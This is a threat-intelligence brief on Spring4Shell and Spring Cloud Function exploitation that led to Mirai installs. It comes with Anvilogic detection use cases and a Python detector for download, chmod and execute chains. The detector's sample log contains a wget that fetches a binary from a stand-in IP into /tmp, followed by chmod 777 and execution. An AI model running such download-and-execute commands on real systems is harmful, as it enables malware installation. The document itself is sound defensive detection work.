2022-04-13

Spring Exploits

Industry: N/A | Level: Tactical | Source: Trend Micro

Trend Micro researchers have tracked exploitation of Spring Core (CVE-2022-22965/Spring4Shell) and Spring Cloud Function (CVE-2022-22963). The exploits lead to the installation of Mirai malware. The earliest exploitation attempts tracked by the security firm were in the Singapore region. Threat actors exploiting the vulnerability were able to upload a web shell and use it to download Mirai botnet malware. The downloaded malware's permissions are then changed with chmod, and it is executed. Lastly, a shell script downloads binaries from an attacker-owned server, installing Mirai samples built for different CPU architectures so that a compatible version runs on the victim host.

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
      • Spring4Shell - CVE-2022-22965
      • Spring-Cloud-Function - CVE-2022-22963
      • Potential Web Shell
      • File Download (Unix)
      • File Modified for Execution
      • File Execution (Unix)
      • Rare shell script execution
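
The scenario named above (Unix File Download, Modified, Executed) can be expressed as a correlation over process-execution events, keyed on host and file path. The following Python is an added example, not Anvilogic's or Trend Micro's detection logic; the log format, host names, file names and five-minute window are constructed assumptions.

```python
import re
import shlex
from datetime import datetime, timedelta

# Constructed process-execution events "<timestamp> <host> <command line>"; not real telemetry.
SAMPLE_EVENTS = """\
2022-04-01T10:00:01 web01 wget http://198.51.100.7/sample.x86 -O /tmp/sample.x86
2022-04-01T10:00:03 web01 chmod 777 /tmp/sample.x86
2022-04-01T10:00:04 web01 /tmp/sample.x86
2022-04-01T10:05:00 web02 curl -o /opt/app/report.csv https://example.com/report.csv
2022-04-01T10:06:00 web02 chmod 644 /opt/app/report.csv
2022-04-01T11:00:00 web03 chmod +x /usr/local/bin/deploy.sh
2022-04-01T11:00:05 web03 sh /usr/local/bin/deploy.sh
"""
WINDOW = timedelta(minutes=5)  # assumed correlation window, tune per environment
OUT_FLAGS = {"wget": ("-O", "--output-document"), "curl": ("-o", "--output")}

def download_target(argv):
    """Return the output path of a wget/curl download, or None (explicit output flag only)."""
    for flag in OUT_FLAGS.get(argv[0].rsplit("/", 1)[-1], ()):
        if flag in argv[:-1]:
            return argv[argv.index(flag) + 1]
    return None

def makes_executable(mode):
    """True if a chmod mode (octal or symbolic) sets any execute bit."""
    if re.fullmatch(r"[0-7]{3,4}", mode):
        return any(int(d) & 1 for d in mode[-3:])
    return re.fullmatch(r"[ugoa]*\+[rwXst]*x[rwXst]*", mode) is not None

def find_chains(log_text, window=WINDOW):
    """Return (host, path, downloaded_at, executed_at) for download -> chmod -> execute chains."""
    state, hits = {}, []  # state: (host, path) -> {"download": time, "chmod": time}
    for line in filter(str.strip, log_text.splitlines()):
        ts, host, cmd = line.split(" ", 2)
        when, argv = datetime.fromisoformat(ts), shlex.split(cmd)
        path = download_target(argv)
        if path:
            state[(host, path)] = {"download": when}
        elif argv[0] == "chmod" and len(argv) >= 3 and makes_executable(argv[1]):
            for target in argv[2:]:
                if (host, target) in state:
                    state[(host, target)]["chmod"] = when
        else:
            # Direct execution by absolute path, or a script handed to sh/bash.
            run = argv[1] if argv[0] in ("sh", "bash") and len(argv) > 1 else argv[0]
            seen = state.get((host, run), {})
            if "chmod" in seen and when - seen["download"] <= window:
                hits.append((host, run, seen["download"], when))
    return hits
```

Events are assumed to arrive in time order. Downloads without an explicit output path and executions by relative path are not tracked here, so production telemetry would need the working directory resolved first.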
